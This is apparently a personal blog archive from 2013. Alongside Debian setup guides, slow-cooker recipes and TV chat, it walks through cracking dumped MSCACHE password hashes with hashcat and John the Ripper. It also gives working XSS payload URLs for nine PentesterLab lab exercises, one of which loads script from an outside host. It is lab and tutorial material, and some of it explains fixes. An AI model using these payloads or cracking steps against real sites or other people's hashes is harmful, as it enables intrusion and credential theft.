Monday 20 May 2013

Debian Optirun/Bumblebee/Ironhide on GT 525M 1 GB and HashCat

So I have a nice little GPU in my testing laptop and have just got it running with Optirun/Bumblebee/Ironhide so I can use it with oclHashCat-Plus.

First you need to add the Debian Bumblebee repo:

$ sudo -s

# wget -O - http://suwako.nomanga.net/suwako.asc | apt-key add -

# nano /etc/apt/sources.list

add the following lines

deb http://suwako.nomanga.net/debian sid main contrib
deb-src http://suwako.nomanga.net/debian sid main

# apt-get update

# apt-get install bumblebee bumblebee-nvidia

# adduser {user} bumblebee

# reboot

Once you're back on, test it's working by running:

$ optirun glxgears -info

If you see three cogs pop up in a window and they turn, it's game on!

Now a real test, hashcat. You need a few libs to run hashcat:

$ sudo apt-get install -y libcuda1

$ cd /opt

$ sudo wget http://hashcat.net/files/oclHashcat-plus-0.14.7z

$ sudo apt-get install p7zip

$ sudo p7zip -d oclHashcat-plus-0.14.7z

$ cd oclHashcat-plus-0.14

Now hashcat can be a bitch to use as every cmd option has to be in the right place; however, it's frick*n awesome, especially with a GPU and there's plenty of info on how to use it here.

Quick e.g. using hashes dumped from MSCACHE, which I'm always attempting to crack ;-) -

./cudaHashcat-plus64.bin -m 1100 {hash-file.cap} {wordlist.txt} -r rules/d3ad0ne.rule -o output.txt

Replace {hash-file.cap} with your captured hash file (hashcat will only accept them in the format administrator:2758937hedfsdjkhgfjk) and replace {wordlist.txt} with the wordlist of your choice.

Wordlists - there's only one for me:

http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2

Happy Cracking ;-)




Compiling Jumbo John (JTR) for MSCACHE Password Auditing

So to attempt a password audit on MSCACHE v2 password hashes you will need to compile John The Ripper Jumbo.

$ wget http://openwall.com/john/g/john-1.7.9-jumbo-7.tar.gz

$ tar zxvf john-1.7.9-jumbo-7.tar.gz

$ cd john-1.7.9-jumbo-7/src/

$ make linux-x86-64    # for a 64-bit OS

$ sudo make install

John will be found in the 'run' directory

$ cd ../run

$ ./john --format=mscash {dumpfile.cap}

Loaded X password hashes with X different salts (M$ Cache Hash MD4 [32/64])

HTH

Sunday 19 May 2013

Debian Wheezy and Sun Java Development Kit

Due to Oracle's bullsh*t redistribution license it's not possible to install Sun Java 7 with the apt packaging manager.

So to install, we need to do a bit of manual malarkey:

$ sudo -s

# cd /opt

# wget http://download.oracle.com/otn-pub/java/jdk/7/jdk-7-linux-x64.tar.gz

# tar xvf jdk-7-linux-x64.tar.gz

# update-alternatives --install /usr/bin/java java /opt/jdk1.7.0_17/bin/java 1

# update-alternatives --install /usr/bin/javac javac /opt/jdk1.7.0_17/bin/javac 1

# update-alternatives --install /usr/lib/mozilla/plugins/libjavaplugin.so mozilla-javaplugin.so /opt/jdk1.7.0_17/jre/lib/amd64/libnpjp2.so 1

# update-alternatives --set java /opt/jdk1.7.0_17/bin/java

# update-alternatives --set javac /opt/jdk1.7.0_17/bin/javac

# update-alternatives --set mozilla-javaplugin.so /opt/jdk1.7.0_17/jre/lib/amd64/libnpjp2.so

Now test that it's worked:


# java -version

java version "1.7.0_17"
Java(TM) SE Runtime Environment (build 1.7.0_17-b02)
Java HotSpot(TM) 64-Bit Server VM (build 23.7-b01, mixed mode)

Job done!

HTH

Saturday 18 May 2013

PentesterLab - Web For Pentester - XSS Example 9


This example is a DOM-based XSS. This page could actually be completely static
and still be vulnerable.

In this example, you will need to read the code of the page to understand what is
happening. When the page is rendered, the JavaScript code uses the current URL
to retrieve the anchor portion of the URL (#...) and dynamically (on the client side)
write it inside the page. This can be used to trigger an XSS if you use the payload as
part of the URL.

Payload
http://192.168.56.101/xss/example9.php#Bobby%3Cscript%3Ealert%28%27Dazzler%27%29%3C/script%3E
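
The flow described above, as an added example (not the lab's source code). It shows that the fragment is never sent to the server and contrasts an HTML-parsing sink with a text-only sink. The function names, the stand-in `document`/element objects and the decoding step are assumptions.

```javascript
// Added example: a model of the client-side flow, not the lab's source code.
// The URL is the payload URL quoted in this post.
const PAYLOAD_URL =
  "http://192.168.56.101/xss/example9.php#Bobby%3Cscript%3Ealert%28%27Dazzler%27%29%3C/script%3E";

// What the browser puts on the HTTP request line: path and query only.
// The fragment stays in the browser, so server logs and server-side
// filters never see the payload.
function requestTarget(url) {
  const u = new URL(url);
  return u.pathname + u.search;
}

// What a page script obtains from the fragment. Decoding it is an
// assumption about the page script.
function fragmentValue(hash) {
  return decodeURIComponent(hash.replace(/^#/, ""));
}

// Vulnerable pattern: the fragment goes to a sink that parses HTML.
function renderUnsafe(doc, hash) {
  doc.write(fragmentValue(hash));
}

// Hardened pattern: the fragment is assigned as text, never parsed as markup.
// In a browser: renderSafe(document.getElementById("greeting"), location.hash)
// where the id "greeting" is hypothetical.
function renderSafe(el, hash) {
  el.textContent = fragmentValue(hash);
}

// Stand-ins for document and an element, so the flow can be checked
// outside a browser.
function demo() {
  const hash = new URL(PAYLOAD_URL).hash;
  const doc = { html: "", write(s) { this.html += s; } };
  const el = { textContent: "" };
  renderUnsafe(doc, hash);
  renderSafe(el, hash);
  return {
    sentToServer: requestTarget(PAYLOAD_URL),
    parsedAsHtml: doc.html,
    shownAsText: el.textContent,
  };
}
```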


PentesterLab - Web For Pentester - XSS Example 8


Here, the value echoed back in the page is correctly encoded. However, there is still
an XSS in this page. To build the form, the developer used and trusted PHP_SELF,
which is the path provided by the user.


Trusting the path provided by users is a common mistake and it can often be used
to trigger XSS along with other issues. It's pretty common in pages with forms and in
error pages (404 and 500 pages).


Payload
http://192.168.56.101/xss/example8.php/%22%3E%3Cscript%3Ealert%28String.fromCharCode%2866,%20111,%2098,%2098,%20121,%2032,%2068,%2097,%20122,%20122,%20108,%20101,%20114%29%29%3C/script%3E


Friday 17 May 2013

PentesterLab - Web For Pentester - XSS Example 7


This example is similar to the one before, however, you won't be able to use special
characters since they will be HTML encoded. As you will see, you don't really need
any of these characters.

This issue is common in PHP web applications because the well-known function
used to HTML-encode characters (htmlentities) does not encode single quotes (')
unless you tell it to using the ENT_QUOTES flag.

Payload
http://192.168.56.101/xss/example7.php?name=Bobby%27;alert%28String.fromCharCode%2868,%2097,%20122,%20122,%20108,%20101,%20114%29%29//
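
An added example (not the lab's code) that models the behaviour described above in JavaScript rather than PHP: the same value placed in a single-quoted JavaScript string with HTML encoding that skips single quotes, with single quotes encoded, and with an encoder built for the JavaScript-string context. The variable name `a`, the template shape and the function names are assumptions; the input is the `name` value from the payload URL above, URL-decoded.

```javascript
// Model of HTML entity encoding. encodeSingleQuote=false mirrors htmlentities
// without ENT_QUOTES; true mirrors it with ENT_QUOTES.
function htmlEncode(s, encodeSingleQuote) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;" };
  if (encodeSingleQuote) map["'"] = "&#039;";
  return s.replace(/[&<>"']/g, (c) => map[c] || c);
}

// Encoder for the JavaScript-string context: a JSON string literal, with
// characters that matter to the surrounding HTML written as \uXXXX escapes.
function jsStringLiteral(s) {
  return JSON.stringify(s).replace(/[<>&'\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Hypothetical script bodies the server would emit between <script> tags.
const vulnerable = (name) => "var a = '" + htmlEncode(name, false) + "';";
const withEntQuotes = (name) => "var a = '" + htmlEncode(name, true) + "';";
const hardened = (name) => "var a = " + jsStringLiteral(name) + ";";

// Evaluate a generated script body with a stub alert() and report the calls
// made and the final value of `a`. Entities are not decoded, which matches
// how a browser treats the content of a <script> element.
function run(script) {
  const calls = [];
  const body = new Function("alert", script + "\nreturn a;");
  const a = body((m) => calls.push(String(m)));
  return { calls, a };
}

// The name parameter from this post's payload URL, URL-decoded.
const PAYLOAD =
  "Bobby';alert(String.fromCharCode(68, 97, 122, 122, 108, 101, 114))//";
```

Only the context-specific encoder both blocks execution and keeps the value intact; encoding the single quote as an entity stops the breakout but leaves a literal `&#039;` in the string.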



PentesterLab - Web For Pentester - XSS Example 6


Here, the source code of the HTML page is a bit different. If you read it, you will see
that the value you are sending is echoed back inside JavaScript code.

Payload
http://192.168.56.101/xss/example6.php?name=%3C?%20echo%28%27%3CSCR%29%27;echo%28%27IPT%3Ealert%28%22Dazzler%22%29%3C/SCRIPT%3EBobby%3Cscript%3Ealert%28%27Dazzler%27%29%3C/script%3E


PentesterLab - Web For Pentester - XSS Example 5


In this example, the <script> tag is accepted and gets echoed back. But as soon as
you try to inject a call to alert, the PHP script stops its execution. The problem
seems to come from a filter on the word alert.

Payload
http://192.168.56.101/xss/example5.php?name=%3CSCRIPT/XSS%20SRC=%22http://ha.ckers.org/xss.js%22%3E%3C/SCRIPT%3E




Again, this isn't the way the paper wanted the alert box to be generated but it's still XSS all the same; just populated from an external source, http://ha.ckers.org/xss.js

PentesterLab - Web For Pentester - XSS Example 4


In this example, the developer decided to completely blacklist the word script: if
the request matches script, the execution stops.

Payload
http://192.168.56.101/xss/example4.php?name=%3Cdiv%20onmouseover=%27alert%281%29%27%20/%3E


PentesterLab - Web For Pentester - XSS Example 3


You notified the developer about your bypass. He added more filtering, which now
seems to prevent your previous payload. However, he is making a terrible mistake in
his code (which was also present in the previous code)...

Payload
http://192.168.56.101/xss/example3.php?name=Bobby%3Cp%20onmouseover=alert%28%27Dazzl%27%29%3Eer%3C/p%3E


This isn't the way the paper wants you to pop the XSS, but I had the payload correct and it wouldn't pop. The correct payload, which should have popped, was:

http://192.168.56.101/xss/example3.php?name=Annoying<<script<>script>alert('Dazzler')<</script<>/script>

Which produced this:


If you know why this didn't work, feel free to comment!

PentesterLab - Web For Pentester - XSS Example 2


In the second example, a bit of filtering is involved. The web developer added a
regular expression to prevent the simple XSS payload from working.

Payload
http://192.168.56.101/xss/example2.php?name=Bobby<SCript>alert('Dazzler')</SCript>


PentesterLab - Web For Pentester - XSS Example 1


The first vulnerable example is just here to get you started with what is going on
when you find an XSS. Using the basic payload, you should be able to get an alert
box.

Payload:
http://192.168.56.101/xss/example1.php?name=bobby%3Cscript%3Ealert%28%27Dazzler%27%29%3C/script%3E


Wednesday 15 May 2013

RECIPE - Slow cooked Greek chicken


Another easy one, and the chicken will melt in your mouth ... trust me ;-)

  • 80g of any flour
  • 1 teaspoon of salt
  • 1/2 teaspoon dried oregano
  • 6 x good quality chicken breast fillets, boneless & skinless
  • 1 x Tin of Heinz, Cream of Chicken soup
  • 125ml white wine 
  • 1 x Knorr Chicken Stock Cube

1 - Mix the flour, salt and oregano together in a large bowl

2 - Score the chicken with a sharp knife, about half way through the breast

3 - Rub the mix into the breasts ;-)

4 - Mix your stock cube with 1/2 pint of boiling water and throw it in the slow cooker

5 - Add the wine and the chicken soup to the slow cooker

6 - Add the chicken breasts

7 - Cook for 4 hours on high or 8 hours on low.

Serve with sticky rice

B00000M

Debian 7 and Gnome

I'm a die hard Debian fan and was recently shocked to find there was no Gnome 2 in the new release, Wheezy.

I searched around a bit and found there was also no fall-back Gnome mode in Debian 7 (Wheezy), either. There is no way I can work with Gnome 3. It's a f*cking atrocity in my opinion.

So I hit the forums and spoke to people to see what they are doing. Many mentioned Mate - Mate you ask?!




There she is, my lovely - Gnome 2 or now called Mate!

Mate is a fantastic fork of Gnome 2 that is continuing the goodness for all us die hard Gnome 2 fans out there.

How do I get this Mate, you ask?

Well, it couldn't be easier. The instructions are all at http://wiki.mate-desktop.org/download but I'll run through them, just so I can pad out this blog post:

sudo nano /etc/apt/sources.list

add the following line:

deb http://repo.mate-desktop.org/debian wheezy main

sudo apt-get update
sudo apt-get install mate-archive-keyring
sudo apt-get update

sudo apt-get install mate-desktop-environment-extra

sudo reboot

Now choose Mate from the list of Desktops on your login screen and sit back and enjoy the goodness of good ole Gnome 2.

HTH

Windows Bootable USB

Extracting the ISO to USB

First we'll need a few bits installed. I'm doing this on a Debian host but I'm sure the packages are there for EL or any other flavour ;-)

su -c 'apt-get install ntfs-3g gparted -y'

So then we need to clean up the USB stick with gparted.

Format it to NTFS using all the space. (Make sure you format the right drive, otherwise you'll FUBAR your OS.) Make a note of the drive number.

Then we need a temporary mount point:

$ mkdir /tmp/windows_usb

Now we mount our ISO:

$ sudo mount -o loop windows_iso.iso /tmp/windows_usb

Now copy over the contents of your ISO to wherever your USB key is mounted; mine's in
/media/37265723dhgsdhg23857/

$ cp -r /tmp/windows_usb/* /media/37265723dhgsdhg23857/

This will probably take a while, depending on the speed of the USB key.

Now we're going to need a little tool called ms-sys. It probably won't be in your standard OS
repos, but it's at sourceforge, and you'll also need to install some tools for building stuff from source:

$ sudo apt-get install build-essential module-assistant gettext -y

$ wget http://prdownloads.sourceforge.net/ms-sys/ms-sys-2.3.0.tar.gz

$ tar xvf ms-sys-2.3.0.tar.gz ; cd ms-sys-2.3.0 ; make ; sudo make install

If all is well you should have no errors and be ready to write a master boot record to the USB drive:

$ sudo ms-sys -7 /dev/sd{?}

Replace {?} with the disk number of your device (noted from gparted)

Now you should have a bootable Windows USB key!

Tuesday 14 May 2013

RECIPE - Slow Cooked Pork Chops

Slow Cooked Pork Chops

Another slow cook favourite of mine is the Pork Chops.

1/4 Mug of good olive oil
1 Mug of Chicken broth (Knorr pods are good)
2 Minced garlic cloves
1 Tablespoon of Paprika
1 Tablespoon of Garlic Powder
1 Teaspoon of dried oregano
1 Teaspoon of dried basil
4 thick cut pork chops
Salt + Black Pepper

Cut some scores about 1/2 way through the Pork chops and rub salt and black pepper into them.

Dissolve your Knorr chicken stock pod into a mug of boiling water and throw it into the slow cooker. Throw in the chopped garlic, paprika, garlic powder, oregano and basil.

Add the pork chops to the mix.

Turn every hour for four hours. Job done.

Serve with buttery mash or sticky rice.

Lurvly!

Thursday 9 May 2013

Windows XP SP2 Windows Update Error 0x80244019

So I had to build a Windows XP machine for some testing I was carrying out tonight and came across Error 0x80244019 when trying to run Windows Update.

It turns out that Microsoft have blocked IE6 from accessing the Windows Update web site and downloading the Windows Update 3.1 Active X controls.

So what you need to do is, download and install IE8 and Windows Update Services in the following order:

1. Upgrade to Internet Explorer 8 (IE8)
2. Reboot Machine.
3. Download Windows Update Agent
4. Save the .exe file to your C: drive
5. Click Start, and then click Run. 
6. Type "C:\WindowsUpdateAgent30-x86.exe /wuforce"  then click OK
7. Install Windows Update agent.
8. Restart the PC and try Windows Updates again.


You should now be able to install the Windows Update Active X control and begin installing the mammoth amount of updates that your XPSP2 build will be missing.

HTH

Installing Virtual Box Guest Additions on Debian

I had a little nightmare with this and couldn't get my head round why I didn't have the kernel headers even though I had installed build-essential. So here's how I did it.

sudo apt-get update -y
sudo apt-get upgrade -y
sudo apt-get install build-essential module-assistant -y
sudo m-a prepare -y

Click on Install Guest Additions from the Devices menu:


Then cancel the autorun prompt as that never works!

Finally, run:

sudo sh /media/cdrom/VBoxLinuxAdditions.run

and follow the instructions on screen.

Restart your VM and it should be job done.

HTH!

End of Season Walking Dead and New Show, Defiance

Last night the wife finally dragged me away from the 'puter to watch some TV with her. It does happen every now and again, depending on my workload.

So, over the bank holiday weekend we caught up with Walking Dead and Elementary. Walking Dead is one of my favourite shows but it is starting to get predictable. *SPOILER* I knew Rick wouldn't live in Woodbury with his guys so there was only one other option. I just wish AMC would let us have a few more episodes in a season than 7, so until October....

Elementary continues to keep both the wife and I absorbed. We love it! I never thought the Americans would be able to pull it off, but they have. Takes a Brit' to do it though ;-). Jonny Lee Miller is pure class but it did take me five or six episodes, to get it out of my head that he isn't Crash Override/Acid Burn or Sickboy any more :-(

However, last night we started a new show called Defiance. It's been recommended by a few people and to be fair, the Pilot episode is pretty good. I kept leaving the living room to fetch books as I was playing with the Twisted Python modules, so we only watched the pilot show. Some of the CGI scenes were a bit budget, but the show is being broadcast on the SyFy channel. However, Falling Skies, back 6/6/13, was first broadcast on a budget channel, TNT, and that show is EPIC!


Wednesday 8 May 2013

See you in 5 hours casserole......

So, I don't think you can beat a recipe as a first post. This one's one of my favourites, primarily 'cause I'm lazy.

When I know the wife or I won't want to cook in the evening, I break out the slow cooker just after lunch.

Chuck all the ingredients in, and I'm not joking. I literally run a knife through veg and meat and throw it in the cooker with a pint and a half of stock (usually Bisto) ;-)


For the full recipe - see 'Easy Slow Cook braised beef'

RECIPE - Easy Slow Cook Braised Beef

Easy Slow Cook Braised Beef

I'm usually a busy boy during the week so, sometimes, just after lunch, I turn the slow cooker on and add the following:

3 Large Braising Steaks - Cubed
3 Large Carrots - roughly sliced
2 Leeks - roughly sliced
1/2 Swede - roughly diced
2 Onions - roughly diced
4 Potatoes - cubed  (or halved depending on size)
2 Cloves of fresh garlic - crushed not sliced
1+1/2 pints of beef stock (cold)
Salt + Black Pepper

Chuck it all in the slow-cooker, stick it on high, and come back in 5 hours. Job done.